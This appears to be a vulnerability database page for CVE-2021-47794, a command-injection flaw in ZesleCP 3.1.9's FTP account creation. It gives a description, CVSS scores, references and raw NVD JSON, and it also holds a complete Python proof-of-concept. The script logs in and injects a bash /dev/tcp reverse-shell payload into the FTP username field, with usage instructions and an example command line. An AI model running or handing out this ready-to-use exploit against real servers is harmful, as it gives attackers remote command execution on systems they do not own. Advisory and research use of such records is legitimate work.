CVE-2021-47794

Description

ZesleCP 3.1.9 contains an authenticated remote code execution vulnerability that allows attackers to create malicious FTP accounts with shell injection payloads. Attackers can exploit the FTP account creation endpoint by injecting a reverse shell command that establishes a network connection to a specified listening host.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:zesle:zeslecp:*:*:*:*:*:*:*:* - VULNERABLE

ZesleCP 3.1.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2021-47794 PoC - ZesleCP Authenticated RCE via FTP Account Creation
Author: Security Researcher
Reference: https://www.exploit-db.com/exploits/50233
"""

import requests
import sys
from urllib.parse import quote

def exploit_zeslecp(target_url, username, password, attacker_ip, attacker_port):
    """
    Exploit the authenticated RCE vulnerability in ZesleCP FTP account creation
    
    Args:
        target_url: Base URL of ZesleCP installation
        username: Valid ZesleCP username
        password: Password for the account
        attacker_ip: Attacker listening IP for reverse shell
        attacker_port: Attacker listening port
    """
    
    session = requests.Session()
    
    # Step 1: Login to ZesleCP
    login_url = f"{target_url}/login"
    login_data = {
        'username': username,
        'password': password
    }
    
    print(f"[*] Logging in to ZesleCP at {target_url}")
    response = session.post(login_url, data=login_data, timeout=30)
    
    if response.status_code != 200:
        print("[-] Login failed - check credentials")
        return False
    
    print("[+] Login successful")
    
    # Step 2: Create malicious FTP account with shell injection payload
    ftp_create_url = f"{target_url}/ftp-account/create"
    
    # Reverse shell payload - inject into FTP account name field
    # Using bash reverse shell technique
    reverse_shell_payload = f"test;bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1;"
    
    ftp_data = {
        'username': reverse_shell_payload,
        'password': 'Password123!',
        'homedir': '/home'
    }
    
    print(f"[*] Creating FTP account with malicious payload...")
    print(f"[*] Payload: {reverse_shell_payload}")
    
    try:
        response = session.post(ftp_create_url, data=ftp_data, timeout=30)
        
        if response.status_code == 200:
            print("[+] Exploit sent - check your listener for reverse shell")
            print(f"[*] Listening on {attacker_ip}:{attacker_port}")
            return True
        else:
            print(f"[-] Exploit failed with status code: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 6:
        print("Usage: python3 cve-2021-47794.py <target_url> <username> <password> <attacker_ip> <attacker_port>")
        print("Example: python3 cve-2021-47794.py https://zeslecp.local admin password123 192.168.1.100 4444")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    passwd = sys.argv[3]
    lhost = sys.argv[4]
    lport = sys.argv[5]
    
    exploit_zeslecp(target, user, passwd, lhost, lport)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47794
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47794
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47794/
[4] VulDB https://vuldb.com/cve/CVE-2021-47794
[5] https://www.exploit-db.com/exploits/50233
[6] https://www.vulncheck.com/advisories/zeslecp-remote-code-execution-rce-authenticated
[7] https://www.youtube.com/watch?v=5lTDTEBVq-0
[8] https://zeslecp.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47794", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:23.387", "lastModified": "2026-01-21T21:56:15.567", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZesleCP 3.1.9 contains an authenticated remote code execution vulnerability that allows attackers to create malicious FTP accounts with shell injection payloads. Attackers can exploit the FTP account creation endpoint by injecting a reverse shell command that establishes a network connection to a specified listening host."}, {"lang": "es", "value": "ZesleCP 3.1.9 contiene una vulnerabilidad de ejecución remota de código autenticada que permite a los atacantes crear cuentas FTP maliciosas con cargas útiles de inyección de shell. Los atacantes pueden explotar el endpoint de creación de cuentas FTP inyectando un comando de shell inverso que establece una conexión de red a un host de escucha especificado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zesle:zeslecp:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.1.9", "matchCriteriaId": "3CB14E4D-D929-4020-A42D-F66F894AD774"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50233", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/zeslecp-remote-code-execution-rce-authenticated", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.youtube.com/watch?v=5lTDTEBVq-0", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://zeslecp.com/", "source": "[email protected]", "tags": ["Product"]}]}}